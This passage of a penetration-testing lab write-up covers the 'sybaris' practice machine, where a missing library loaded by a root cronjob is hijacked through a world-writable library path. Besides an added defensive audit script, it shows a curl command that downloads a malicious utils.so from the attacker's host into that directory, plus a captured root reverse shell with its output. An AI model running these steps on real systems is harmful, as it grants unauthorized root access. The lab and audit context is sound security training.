Loading a Malicious Shared Object Library with Cronjob


A system-wide root cronjob executes the log-sweeper binary every minute, and LD_LIBRARY_PATH includes a world-writable directory (/usr/local/lib/dev), so any local user can drop files there. The log-sweeper binary is dynamically linked and tries to load utils.so, which fails because the library is missing. Because the writable directory is on the library search path, an attacker could place a malicious utils.so there and the dynamic loader would pick it up, giving code execution as root the next time the cronjob runs.
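
The same two conditions can be audited from the defender's side. The following bash helper is an added example, not part of the original write-up: it flags world-writable directories on a library search path and libraries a scheduled binary cannot resolve; the function names and the /usr/local/bin/log-sweeper path in the sample call are this example's own assumptions.

```bash
#!/usr/bin/env bash
# Added audit helper (not part of the original write-up). It checks the two
# conditions that enable the cron-driven hijack above: a world-writable
# directory on the library search path, and a shared object the scheduled
# binary cannot resolve. Function names are this example's own.

# Print every world-writable directory in a colon-separated search path,
# e.g. writable_lib_dirs "$LD_LIBRARY_PATH".
writable_lib_dirs() {
  local IFS=':' dir
  for dir in $1; do
    [ -n "$dir" ] && [ -d "$dir" ] || continue
    # -perm -0002 matches "other"-writable modes such as drwxrwxrwx
    find "$dir" -maxdepth 0 -perm -0002 2>/dev/null
  done
}

# Read ldd output on stdin and print the names of unresolved libraries,
# i.e. lines shaped like "utils.so => not found".
unresolved_from_ldd() {
  awk '$2 == "=>" && $3 == "not" && $4 == "found" { print $1 }'
}

# Report a finding for one scheduled binary when a library it cannot
# resolve could be supplied from a world-writable search-path directory.
# Returns 1 on a finding, 0 otherwise. The second argument defaults to
# the caller's LD_LIBRARY_PATH; pass the value cron actually exports.
audit_cron_binary() {
  local bin="$1" libpath="${2:-$LD_LIBRARY_PATH}" dirs missing
  dirs=$(writable_lib_dirs "$libpath")
  missing=$(ldd "$bin" 2>/dev/null | unresolved_from_ldd)
  if [ -n "$dirs" ] && [ -n "$missing" ]; then
    printf 'HIGH: %s cannot resolve: %s; writable search dir(s): %s\n' \
      "$bin" "$(echo "$missing" | xargs)" "$(echo "$dirs" | xargs)"
    return 1
  fi
  return 0
}

# Sample invocation mirroring the write-up's layout (binary path is a placeholder):
# audit_cron_binary /usr/local/bin/log-sweeper /usr/local/lib/dev
```

Run it with the LD_LIBRARY_PATH value the cron environment exports (from the crontab or its environment file), not the one in an interactive shell, or the writable directory will be missed.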

[pablo@sybaris /]$ curl -s http://192.168.45.218/utils.so -o /usr/local/lib/dev/utils.so ; chmod 777 /usr/local/lib/dev/utils.so
 
[pablo@sybaris /]$ ll /usr/local/lib/dev/
total 4.0K
   0 drwxrwxrwx  2 root  root   22 Mar 29 10:02 .
4.0K -rwxrwxrwx  1 pablo pablo 521 Mar 29 10:02 utils.so
   0 drwxr-xr-x. 4 root  root   30 Sep  7  2020 ..

Delivering the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ nnc 21  
listening on [any] 21 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.185.93] 42016
whoami
root
hostname
sybaris
ifconfig
/bin/sh: line 3: ifconfig: command not found
/sbin/ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.185.93  netmask 255.255.255.0  broadcast 192.168.185.255
        ether 00:50:56:9e:c4:cc  txqueuelen 1000  (Ethernet)
        RX packets 11909  bytes 5426439 (5.1 MiB)
        RX errors 0  dropped 517  overruns 0  frame 0
        TX packets 2622  bytes 446573 (436.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 139  bytes 10970 (10.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 139  bytes 10970 (10.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System-level compromise